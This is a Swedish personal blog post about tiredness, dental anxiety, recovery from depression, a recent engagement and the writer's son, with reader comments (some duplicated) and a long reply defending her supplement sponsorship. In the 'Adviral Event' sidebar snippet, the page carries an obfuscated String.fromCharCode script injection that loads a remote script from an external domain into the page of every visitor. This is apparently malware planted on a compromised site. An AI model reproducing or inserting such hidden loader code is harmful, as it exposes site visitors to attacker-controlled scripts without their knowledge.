Tuffa beslut…. Snart börjar ett nytt kapitel i mitt/vårat liv!

475A8864

Trött, tröttare, tröttast!

Eftersom jag känna mig halvkrasslig så kör jag mina PW och squats. Inte högintensivt alltså. Idag blev det 1h utomhus. I ett lagom ansträngande tempo där min puls var lätt ansträngd. Detta i kombination med frisk luft gjorde susen!  Plus mina squats👊🏻 Istället för 3×25 körde jag 5×10. Djupa, och i ett lugnt tempo där jag kan behålla en relativt låg puls.

För dig som inte känner dig krasslig. Våga utmana dig själv, öka distansen, och testa dig fram med mina övningar jag hittills lagt ut. Ställ gärna frågor om du undrar över något, så ska jag göra mitt bästa för att svara☺️ Sockerfritt gör susen för min del! 

 Jag mår bättre idag. Satan i gatan vad den där rotfyllningen sög musten ur mig! F*CK! vad jag inte gillar att ligga i tandläkarstolen! Men min tandläkare är jätte bra! Jag är dock en väldigt ”jobbig” kund. Spänner mig, ryggar undan, gråter och får panik emellanåt. Men jag kanske vänjer mig. Jag har ca 14 tider kvar…. ( SUCK!!!😝) 

Just nu är min energi på botten!

Jag hade kunnat skriva ”Hepp hepp allt är så undebart” 

Men detta är en ärlig blogg ( Ibland liiiite för ärlig enligt Jonas) i med och motgång. jag hoppas att du uppskattar det. 

Jag har haft så sjukt många beslut att ta på sista tiden. Som vanligt tycker vissa av er att jag borde vara tyst tills jag har någonting att säga. Men ärligt talat, min blogg här bestämmer jag 😉 hehe! 

Ibland försöker jag att le, när jag egentligen bara vill gråta. För min inställning är ändå att ett leende får både mig själv och andra att må så mycket bättre =)

Jonas kan ibland säga ”My, du är verkligen en känslomänniska”. I rent självförsvar så svarar jag snabbt -Näää, det är jag inte alls! Men jag erkänner, det är jag visst!

Är jag glad, då kvittrar jag som en fågel. Är jag sur, då missar ingen det! Jag blir sur som en citron, men det går snabbt över ☺️.  Är jag ledsen då är jag ledsen…. Ja du fattar nog. 

MEN, det värsta jag vet är ovisshet.

Jag är otålig och vill ha svar och besked direkt. Jag är ett kontrollfreak utan dess like! Detta har förvärrats sedan min depression. Jag får beslutsångest för saker som egntligen inte spelar någon roll…. Just när det ligger större beslut bakom. Då kan jag tex fastna i mataffären och knappt bestämma mig för vilken kvarg jag ska köpa. ( Alltså världens ”mista” grej känna super jobbig…. )

Nu sista veckorna har livet både öppnat och stängt dörrar. 

Möjligheter och nya beslut har behövts att ta. Jag kämpar på så gott jag kan med att samla ihop mig själv, att få helheten att fungera och hitta en balans där jag mår bra. Titta på bilden ovan, en trött tjej, med ett smile på läpparna, med en svullnad i ansiktet och en trött blick. Jag är verkligen SÅ trött!

-Årstiden? Pressen? Mörkret? Why?

Jag har fart omkring som en dåre på sista tiden. Hoppat mellan hopp och förtvivlan. Ventilerat med några få av mina vänner. Försökt att ta ”rätt” beslut för mig och min familj! Det komiska är att allt kommer på en och samma gång. Det är nästan alltid så när jag tänker efter. Både jobb och privat är i gungning nu…. och allting hänger ju faktiskt ihop.

Jag har svurit av frustration. HUR jag än gör så blir någonting lidande. Varför kan jag inte bara klona mig!

-Damn! Livet är inte alltid enkelt helt enkelt! Och långt ifrån rättvist….. Men med rätt inställning så klarar man det mesta. Jag tror verkligen det!

Jag är dessutom  envis om en j*vla åsna, och nu förökar jag göra det till en positiv egenskap! hehe! 

Jag har ju ändå en hel del saker att vara både tacksam och lycklig över! Jag är nyförlovad med min Indian❤️

jag har landat på fötterna rätt bra efter omständigheterna. Jag mår i det stora hela MYCKET bättre än tidigare. Min kropp har äntligen börjat ”svara” på min träning och kost. Mina värden ser bättre ut än på länge. Min KBT terapeut tycker att jag gör framsteg 😉 Utbildningen går sakta men säkert framåt och jag har en karriär som väntar på mig.

Sist men störst av allt! Jag har en son, världens finaste Lilleman. Han är frisk, han mår bra och han är mitt ALLT!

Jag älskar denna bilden på honom och Bobby ❤️Sötisar! Påtal om Bobby, missa inte erbjudande på han Super Hair i förra  inlägget…

475A9828

Nu ska jag anstränga mig maximalt för att få dom sista puzzelbitarna på plats☺️

Snart min vän, då börjat ett nytt stort kapitel i mitt/vårat liv…..

Jonas ska strax he sig iväg på gigg. Jag ska göra några ärenden i stan. Sen blir det nog tidigt kväll. Imorgon är det dubbla födelsedagskalas ☺️

Kram Kram

/ My Martens 

13 Komentarer

  1. Din trovärdighet gällande det du sponsrar minskar alltmer. Du verkar ju inte svara på alla dessa vitaminer du gör reklam för, hur ska vi som kunder tro på dessa..?

    • Kopierat in Samma svar till dig:
      Godkväll Linda! Jag sitter uppe vid datorn då jag vaknade och inte kunde somna. Klockan är mitt i natten OCH jag har dyslexi så bortse från alla tokiga stavfel som eventuellt dyker upp! hehe! =) Detta är en mycket intressant fråga… eller snarare ett ämne =) Alla får självklart ha en åsikt, det stöttar jag helhjärtat! =) Men vad baserar du DIN på? Jag är nyfiken, så berätta gärna… Att göra reklam för så många kosttillskott? Men vad har min marknadsföring kring kosttilskott med mitt immunförsvar att göra?
      Behöver jag se ut som en fittnestävlande för att jag är PT? Tror du att jag har fler blommor hemma än alla andra för att han är florist? =) Nej, linda. Nu har du fått något om bakfoten.
      Jag har klivit in i ett samarbete med Skip Nutrition. Ett samarbete som jag är mycket glad och stolt över. Skip Nutrition är nämligen ett svensk familjeföretag som brinna för det dom gör. Dom har sunda värderingar, och står för samma saker som jag själv gör. Dom jobbar med elitidrottare och professionella idrottare. Dom finns både online och på apotek. Genom mig så är tanken att nå ut till den ”vanliga” massan. Alltså kvinnor och män som brinner för välmående, precis om JAG!
      Men skillnaden på mig och majoriteten. Det är att jag pendlar, jag sitter i bilen och kör hundratals mil i månaden.Jag har precis kommit på fötter efter en konkurs och x-antal dödsfall. Dessa två faktorer gjorde att jag gick in i väggen. Krasch, boom och där var jag utbränd med en djup depression . Det gjorde att mitt immunförsvar varit kraftigt nedsatt under en längre tid. och till viss del fortfarande är.
      Kosttillskott är individuellt. Du behöver inte samma saker som jag. Jag behöver inte samma saker som min granne. Ingenting är skrivit i sten- För om jag tex har järnbrist nu, så kanske jag inte har det om ett halvår. tanken med kosttilskott rent generellt är just ”tillskott” fylla på med det som vi behöver. jag slarvar extremt mycket med att äta fisk tex, därför behöver jag i period omega-3. Under vinterhalvåret så visar mina provsvar ofta hos doktorn att jag har D-vitamin brist (väldigt vanligt hos dom flesta) Så då boostar jag med det =) Mitt immunförsvar var i botten. När jag mådde som sämst för ca 1 år sedan, då fick jag blintarm, njursten, och opererades TRE gånger på 4 dagar ( googla så kan du läsa om det) Detta följt av en lunginflammation. Hela min kropp sa ifrån pga av att mitt immunförsvar checkat ut. Läkaren förklarade att detta hör till när man mådde som jag gjorde. Jag går regelbundet och lämnar prover, även idag. Nu mår jag tack och lov mycket bättre. Men jag är fordrande skör…. Mitt immunförsvar har också blivit bättre. tack vara alla otroligt proffsiga människor jag har omkring mig, hela teamet på skip nutrition, min husläkare och min specialist doktor så har jag klarat mig hyfsat bra. Jag har landat på båda fötterna och både kropp och knopp hänger med =) Så dessa omgångar med krasslighet och förkylningar är ingenting mot hur det kunde ha varit =) Det är inte mer än vad ”alla andra” åker på. Trots att Lilleman drar med sig grejs hem från förskolan så har jag (peppar peppar) klarat mig emot det i år =) Sen brinner jag för att kunna hjälpa och inspirera andra. Det är ju så otroligt dumt att gå kring och vara trött och orkeslös pga av något så enkelt som tex D-vitamin brist, sak är SÅ vanligt här uppe med vårat klimat, kan jag då tips som det och göra så att några människor får känna att dom mår mycket bättre, då betyder det otroligt mycket för mig =) OJ, Linda vilket långt svar det blev. men jag håller verkligen med dig, det har verkligen en poäng =) Kram och trevlig helg!

  2. du vet att Danderyds sjukhus har tandläkare där du kan vara sövd under tiden så gör dom allt på engång det som är dyrast är narkosen resten är vanlig tandläkare kostnad.

  3. Din trovärdighet gällande det du sponsrar minskar alltmer. Du verkar ju inte svara på alla dessa vitaminer du gör reklam för, hur ska vi som kunder tro på dessa..?

    • Kopierat in Samma svar till dig:

      Godkväll Linda! Jag sitter uppe vid datorn då jag vaknade och inte kunde somna. Klockan är mitt i natten OCH jag har dyslexi så bortse från alla tokiga stavfel som eventuellt dyker upp! hehe! =) Detta är en mycket intressant fråga… eller snarare ett ämne =) Alla får självklart ha en åsikt, det stöttar jag helhjärtat! =) Men vad baserar du DIN på? Jag är nyfiken, så berätta gärna… Att göra reklam för så många kosttillskott? Men vad har min marknadsföring kring kosttilskott med mitt immunförsvar att göra?

      Behöver jag se ut som en fittnestävlande för att jag är PT? Tror du att jag har fler blommor hemma än alla andra för att han är florist? =) Nej, linda. Nu har du fått något om bakfoten.

      Jag har klivit in i ett samarbete med Skip Nutrition. Ett samarbete som jag är mycket glad och stolt över. Skip Nutrition är nämligen ett svensk familjeföretag som brinna för det dom gör. Dom har sunda värderingar, och står för samma saker som jag själv gör. Dom jobbar med elitidrottare och professionella idrottare. Dom finns både online och på apotek. Genom mig så är tanken att nå ut till den ”vanliga” massan. Alltså kvinnor och män som brinner för välmående, precis om JAG!

      Men skillnaden på mig och majoriteten. Det är att jag pendlar, jag sitter i bilen och kör hundratals mil i månaden.Jag har precis kommit på fötter efter en konkurs och x-antal dödsfall. Dessa två faktorer gjorde att jag gick in i väggen. Krasch, boom och där var jag utbränd med en djup depression . Det gjorde att mitt immunförsvar varit kraftigt nedsatt under en längre tid. och till viss del fortfarande är.

      Kosttillskott är individuellt. Du behöver inte samma saker som jag. Jag behöver inte samma saker som min granne. Ingenting är skrivit i sten- För om jag tex har järnbrist nu, så kanske jag inte har det om ett halvår. tanken med kosttilskott rent generellt är just ”tillskott” fylla på med det som vi behöver. jag slarvar extremt mycket med att äta fisk tex, därför behöver jag i period omega-3. Under vinterhalvåret så visar mina provsvar ofta hos doktorn att jag har D-vitamin brist (väldigt vanligt hos dom flesta) Så då boostar jag med det =) Mitt immunförsvar var i botten. När jag mådde som sämst för ca 1 år sedan, då fick jag blintarm, njursten, och opererades TRE gånger på 4 dagar ( googla så kan du läsa om det) Detta följt av en lunginflammation. Hela min kropp sa ifrån pga av att mitt immunförsvar checkat ut. Läkaren förklarade att detta hör till när man mådde som jag gjorde. Jag går regelbundet och lämnar prover, även idag. Nu mår jag tack och lov mycket bättre. Men jag är fordrande skör…. Mitt immunförsvar har också blivit bättre. tack vara alla otroligt proffsiga människor jag har omkring mig, hela teamet på skip nutrition, min husläkare och min specialist doktor så har jag klarat mig hyfsat bra. Jag har landat på båda fötterna och både kropp och knopp hänger med =) Så dessa omgångar med krasslighet och förkylningar är ingenting mot hur det kunde ha varit =) Det är inte mer än vad ”alla andra” åker på. Trots att Lilleman drar med sig grejs hem från förskolan så har jag (peppar peppar) klarat mig emot det i år =) Sen brinner jag för att kunna hjälpa och inspirera andra. Det är ju så otroligt dumt att gå kring och vara trött och orkeslös pga av något så enkelt som tex D-vitamin brist, sak är SÅ vanligt här uppe med vårat klimat, kan jag då tips som det och göra så att några människor får känna att dom mår mycket bättre, då betyder det otroligt mycket för mig =) OJ, Linda vilket långt svar det blev. men jag håller verkligen med dig, det har verkligen en poäng =) Kram och trevlig helg!

  4. du vet att Danderyds sjukhus har tandläkare där du kan vara sövd under tiden så gör dom allt på engång det som är dyrast är narkosen resten är vanlig tandläkare kostnad.

  5. Ett varmt tips är att vända sig till Aqua Dental som har specialister inom just rädda personer. Det är ju så vanligt.
    sen även en annan grej, utan att skriva ut det hela här… ååååååååååå…. och lite girly så säger jag också … iiiiiiii haha jag tror mig veta och är så glad. ? ?

  6. Ett varmt tips är att vända sig till Aqua Dental som har specialister inom just rädda personer. Det är ju så vanligt.
    sen även en annan grej, utan att skriva ut det hela här… ååååååååååå…. och lite girly så säger jag också … iiiiiiii haha jag tror mig veta och är så glad. 😀 😀

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/